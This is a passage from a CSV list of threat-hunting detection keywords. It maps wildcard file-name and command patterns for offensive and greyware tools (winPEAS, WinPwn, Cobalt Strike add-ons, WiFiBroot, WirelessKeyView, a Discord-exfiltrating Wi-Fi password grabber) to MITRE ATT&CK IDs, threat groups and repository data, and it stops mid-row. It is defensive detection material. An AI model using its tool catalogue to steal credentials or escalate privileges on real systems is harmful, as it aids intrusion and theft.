-*winPEASps1*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*winPEASx64.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*winPEASx64.exe*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*winPEASx64_ofs.exe*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*winPEASx86.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*winPEASx86.exe*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 
- T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*winPEASx86_ofs.exe*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*winPEASx86_ofs.exe*,offensive_tool_keyword,PEASS,PEASS - Privilege Escalation Awesome Scripts SUITE,T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002,TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005,N/A,N/A,Privilege Escalation,https://github.com/carlospolop/PEASS-ng,1,1,N/A,N/A,10,13375,2820,2023-10-02T22:12:50Z,2019-01-13T19:58:24Z -*Win-PS2EXE.exe*,offensive_tool_keyword,PS2EXE,Module to compile powershell scripts to executables,T1027.001 - T1564.003 - T1564.005,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/MScholtes/PS2EXE,1,1,N/A,N/A,9,834,154,2023-09-26T15:03:14Z,2019-11-08T09:25:02Z -*WinPwn -*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*WinPwn.exe*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*WinPwn.ps1*,offensive_tool_keyword,WinPwn,Automation for 
internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*WinPwnage*,offensive_tool_keyword,WinPwnage,various exploitation tools for windows ,T1203 - T1059 - T1547.001,TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/rootm0s/WinPwnage,1,1,N/A,N/A,10,2498,386,2023-02-13T09:43:13Z,2018-04-08T18:51:50Z -*winpwnage.functions*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*winreconstreamline.bat*,offensive_tool_keyword,Windows-Privilege-Escalation,Windows Privilege Escalation Techniques and Scripts,T1055 - T1548 - T1078,TA0004 - TA0005 - TA0040,N/A,N/A,Privilege Escalation,https://github.com/frizb/Windows-Privilege-Escalation,1,1,N/A,N/A,8,710,185,2020-03-25T22:35:02Z,2017-05-12T13:09:50Z -*winregistry.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*WinRing0*WinRing0x64.sys*,greyware_tool_keyword,xmrig,CPU/GPU cryptominer often used by attackers on compromised machines,T1496 - T1057,TA0004 - TA0007,N/A,N/A,Cryptomining,https://github.com/xmrig/xmrig/,1,1,N/A,9,10,7768,3471,2023-09-29T12:15:29Z,2017-04-15T05:57:53Z -*winrm_command_shell.rb*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*winrm_script_exec.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*winrmdll *,offensive_tool_keyword,cobaltstrike,C++ WinRM API via Reflective DLL,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mez-0/winrmdll,1,0,N/A,10,10,138,27,2021-09-11T13:44:16Z,2021-09-11T13:40:22Z 
-*winrmdll.*,offensive_tool_keyword,cobaltstrike,C++ WinRM API via Reflective DLL,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/mez-0/winrmdll,1,1,N/A,10,10,138,27,2021-09-11T13:44:16Z,2021-09-11T13:40:22Z -*winrs -r:*whoami*,greyware_tool_keyword,winrs,WinRS for Lateral Movement,T1021.006 - T1028,TA0008 ,N/A,N/A,Lateral Movement,N/A,1,0,N/A,6,10,N/A,N/A,N/A,N/A -*WinSCPPasswdExtractor*,offensive_tool_keyword,WinSCPPasswdExtractor,Extract WinSCP Credentials from any Windows System or winscp config file,T1003.001 - T1083 - T1145,TA0003 - TA0007 - TA0008,N/A,N/A,Credential Access,https://github.com/NeffIsBack/WinSCPPasswdExtractor,1,1,N/A,N/A,1,8,0,2023-07-01T17:27:32Z,2022-12-20T11:55:55Z -*WinShellcode.git*,offensive_tool_keyword,WinShellcode,It's a C code project created in Visual Studio that helps you generate shellcode from your C code.,T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027,TA0002 - TA0006,N/A,N/A,Exploitation 
tools,https://github.com/DallasFR/WinShellcode,1,1,N/A,N/A,,N/A,,, -*WinShellcode-main*,offensive_tool_keyword,WinShellcode,It's a C code project created in Visual Studio that helps you generate shellcode from your C code.,T1059.001 - T1059.003 - T1059.005 - T1059.007 - T1059.004 - T1059.006 - T1218 - T1027.001 - T1564.003 - T1027,TA0002 - TA0006,N/A,N/A,Exploitation tools,https://github.com/DallasFR/WinShellcode,1,1,N/A,N/A,,N/A,,, -*Winsocky-main*,offensive_tool_keyword,cobaltstrike,Winsocket for Cobalt Strike.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/WKL-Sec/Winsocky,1,1,N/A,10,10,79,13,2023-07-06T11:47:18Z,2023-06-22T07:00:22Z -*WINspect.ps1*,offensive_tool_keyword,WINspect,WINspect is part of a larger project for auditing different areas of Windows environments.It focuses on enumerating different parts of a Windows machine to identify security weaknesses and point to components that need further hardening.can be used by attacker ,T1018 - T1082 - T1057 - T1547.001 - T1053,TA0003 - TA0006 - TA0008 - TA0010,N/A,N/A,Information Gathering,https://github.com/A-mIn3/WINspect,1,1,N/A,N/A,6,568,116,2019-01-09T12:56:57Z,2017-08-10T15:10:10Z -*win-x64-DynamicKernelWinExecCalc*,offensive_tool_keyword,Dinjector,Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL,T1055 - T1055.012 - T1055.001 - T1027.002,TA0005 - TA0002,N/A,N/A,Exploitation tools,https://github.com/Metro-Holografix/DInjector,1,1,private github repo,10,,N/A,,, -*Wiper POC tool that wipes a given directory*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*WiperPoc.exe*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - 
T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,1,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*WiperPoc\WiperPoc*,offensive_tool_keyword,ContainYourself,Abuses the Windows containers framework to bypass EDRs.,T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015,TA0005,N/A,N/A,Defense Evasion,https://github.com/deepinstinct/ContainYourself,1,0,N/A,10,3,257,31,2023-08-31T07:26:22Z,2023-07-12T14:47:24Z -*wireghoul/htshells*,offensive_tool_keyword,htshells,Self contained htaccess shells and attacks,T1059 - T1059.007 - T1027 - T1027.001 - T1070.004,TA0005 - TA0011 - TA0002 - TA0003,N/A,N/A,C2,https://github.com/wireghoul/htshells,1,1,N/A,10,10,945,196,2022-02-17T00:26:23Z,2011-05-16T02:21:59Z -*wireless/captures.py*,offensive_tool_keyword,wifibroot,A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing,T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Network Exploitation tools,https://github.com/hash3liZer/WiFiBroot,1,1,N/A,N/A,9,866,180,2021-01-15T09:07:36Z,2018-07-30T10:57:22Z -*wireless/cracker.py*,offensive_tool_keyword,wifibroot,A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing,T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Network Exploitation tools,https://github.com/hash3liZer/WiFiBroot,1,1,N/A,N/A,9,866,180,2021-01-15T09:07:36Z,2018-07-30T10:57:22Z -*wireless/pmkid.py*,offensive_tool_keyword,wifibroot,A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. 
supports a deauthentication/jammer mode for stress testing,T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Network Exploitation tools,https://github.com/hash3liZer/WiFiBroot,1,1,N/A,N/A,9,866,180,2021-01-15T09:07:36Z,2018-07-30T10:57:22Z -*wireless/sniper.py*,offensive_tool_keyword,wifibroot,A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. supports a deauthentication/jammer mode for stress testing,T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573,TA0001 - TA0002 - TA0007 - TA0011,N/A,N/A,Network Exploitation tools,https://github.com/hash3liZer/WiFiBroot,1,1,N/A,N/A,9,866,180,2021-01-15T09:07:36Z,2018-07-30T10:57:22Z -*wireless_attack_tools.py*,offensive_tool_keyword,hackingtool,ALL IN ONE Hacking Tool For Hackers,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/Z4nzu/hackingtool,1,1,N/A,N/A,10,39264,4347,2023-09-13T19:08:33Z,2020-04-11T09:21:31Z -*wirelesskeyview.exe*,offensive_tool_keyword,WirelessKeyView,WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ,T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/wireless_key.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wirelesskeyview.zip*,offensive_tool_keyword,WirelessKeyView,WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ,T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/wireless_key.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*WirelessKeyView_x64.exe*,offensive_tool_keyword,WirelessKeyView,WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer 
,T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/wireless_key.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wirelesskeyview-no-command-line.zip*,offensive_tool_keyword,WirelessKeyView,WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ,T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/wireless_key.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*wirelesskeyview-x64.zip*,offensive_tool_keyword,WirelessKeyView,WirelessKeyView recovers all wireless network security keys/passwords (WEP/WPA) stored in your computer ,T1003 - T1016 - T1021 - T1056 - T1110 - T1212 - T1552 - T1557,TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011,N/A,N/A,Credential Access,https://www.nirsoft.net/utils/wireless_key.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Wireshark*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wireshark*.deb*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*Wireshark*.dmg*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wireshark-*.tar.xz*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - 
TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wireshark-common*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wireshark-dev*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wireshark-gtk*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*WiresharkPortable64*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wireshark-qt*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*Wireshark-win*.exe*,greyware_tool_keyword,wireshark,Wireshark is a network protocol analyzer.,T1040 - T1052.001 - T1046,TA0001 - TA0002 - TA0007,N/A,N/A,Sniffing & Spoofing,https://www.wireshark.org/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*wiresocks-main*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense 
Evasion,https://github.com/sensepost/wiresocks,1,1,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -*wiresocks-redsocks*,offensive_tool_keyword,wiresocks,Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.,T1090.004 - T1572 - T1021.001,TA0011 - TA0002 - TA0040,N/A,N/A,Defense Evasion,https://github.com/sensepost/wiresocks,1,1,N/A,9,3,250,24,2022-09-29T07:41:16Z,2022-03-23T12:27:07Z -*Witness.py*,offensive_tool_keyword,EyeWitness,EyeWitness is designed to take screenshots of websites provide some server header info. and identify default credentials if known.EyeWitness is designed to run on Kali Linux. It will auto detect the file you give it with the -f flag as either being a text file with URLs on each new line. nmap xml output. or nessus xml output. The --timeout flag is completely optional. and lets you provide the max time to wait when trying to render and screenshot a web page.,T1564 - T1518 - T1210 - T1514 - T1552,TA0002 - TA0007,N/A,N/A,Information Gathering,https://github.com/FortyNorthSecurity/EyeWitness,1,1,N/A,N/A,10,4413,812,2023-09-21T20:34:04Z,2014-02-26T16:23:25Z -*WitnessMe*,offensive_tool_keyword,WitnessMe,WitnessMe is primarily a Web Inventory tool inspired by Eyewitness. 
its also written to be extensible allowing you to create custom functionality that can take advantage of the headless browser it drives in the back-end.,T1210.001 - T1593.001 - T1593.002,TA0010 - ,N/A,N/A,Information Gathering,https://github.com/byt3bl33d3r/WitnessMe,1,1,N/A,N/A,7,688,109,2022-12-08T11:04:13Z,2019-07-06T05:25:10Z -*WkIKjtCbQzcqQd04ZsE4sFefvpjryhU5w9iVFxGz1oU*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*WKL-Sec/dcomhijack*,offensive_tool_keyword,dcomhijack,Lateral Movement Using DCOM and DLL Hijacking,T1021 - T1021.003 - T1574 - T1574.007 - T1574.002,TA0008 - TA0005 - TA0002,N/A,N/A,Lateral Movement,https://github.com/WKL-Sec/dcomhijack,1,1,N/A,10,3,228,23,2023-06-18T20:34:03Z,2023-06-17T20:23:24Z -*WKL-Sec/HiddenDesktop*,offensive_tool_keyword,cobaltstrike,Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. 
This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++,T1021.001 - T1133,TA0005 - TA0002,N/A,N/A,C2,https://github.com/WKL-Sec/HiddenDesktop,1,1,N/A,10,10,925,147,2023-05-25T21:27:20Z,2023-05-21T00:57:43Z -*WKL-Sec/Winsocky*,offensive_tool_keyword,cobaltstrike,Winsocket for Cobalt Strike.,T1572 - T1041 - T1105,TA0011 - TA0002 - TA0040,N/A,N/A,C2,https://github.com/WKL-Sec/Winsocky,1,1,N/A,10,10,79,13,2023-07-06T11:47:18Z,2023-06-22T07:00:22Z -*wkssvc_##*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*WLAN-Windows-Passwords-Discord-Exfiltration*,offensive_tool_keyword,WLAN-Windows-Passwords,Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord 
Webhook.,T1056.005 - T1552.001 - T1119 - T1071.001,TA0004 - TA0006 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords,1,0,N/A,10,6,542,213,2023-09-28T12:35:19Z,2021-09-08T20:33:18Z -*WldpBypass.cs*,offensive_tool_keyword,CheeseTools,tools for Lateral Movement/Code Execution,T1021.006 - T1059.003 - T1105,TA0008 - TA0002,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/klezVirus/CheeseTools,1,1,N/A,10,7,653,138,2021-08-17T20:22:56Z,2020-08-24T01:28:12Z -*wl-lic -d *.dat -r *.rsa*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation tools,https://github.com/charlesnathansmith/whatlicense,1,0,N/A,6,1,61,5,2023-07-23T03:10:44Z,2023-07-10T11:57:44Z -*wl-lic -h HWID -m main_hash -d regkey2.dat -r regkey2.rsa*,offensive_tool_keyword,whatlicense,WinLicense key extraction via Intel PIN,T1056 - T1056.001 - T1518 - T1518.001,TA0005 - TA0006,N/A,N/A,Exploitation 